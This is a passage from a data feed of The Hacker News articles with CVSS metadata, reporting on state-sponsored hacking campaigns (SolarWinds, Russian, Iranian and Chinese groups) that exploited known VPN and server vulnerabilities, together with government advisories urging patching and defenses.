SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e100/flaws.gif>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:43", "description": "[](<https://thehackernews.com/images/--IMTlu9ODmc/X88RfSygd-I/AAAAAAAABLU/uuyriiIITxAUZ5KFyskGEDluk-7HRUwpgCLcBGAsYHQ/s0/vmware.jpg>)\n\nThe US National Security Agency (NSA) on Monday issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2434988/russian-state-sponsored-malicious-cyber-actors-exploit-known-vulnerability-in-v/>) warning that Russian threat actors are leveraging recently disclosed VMware vulnerability to install malware on corporate systems and access protected data.\n\nSpecifics regarding the identities of the threat actor exploiting the [VMware flaw](<https://thehackernews.com/2020/11/critical-unpatched-vmware-flaw-affects.html>) or when these attacks started were not disclosed.\n\nThe development comes two weeks after the virtualization software company publicly disclosed the flaw\u2014affecting VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector products for Windows and Linux\u2014without releasing a patch and three days after releasing a software update to fix it.\n\nIn late November, VMware pushed [temporary workarounds](<https://kb.vmware.com/s/article/81731>) to address the issue, stating permanent patches for the flaw were \"forthcoming.\" But it wasn't until December 3rd the escalation-of-privileges bug was entirely resolved.\n\nThat same day, the US Cybersecurity and Infrastructure Security Agency (CISA) issued a [brief 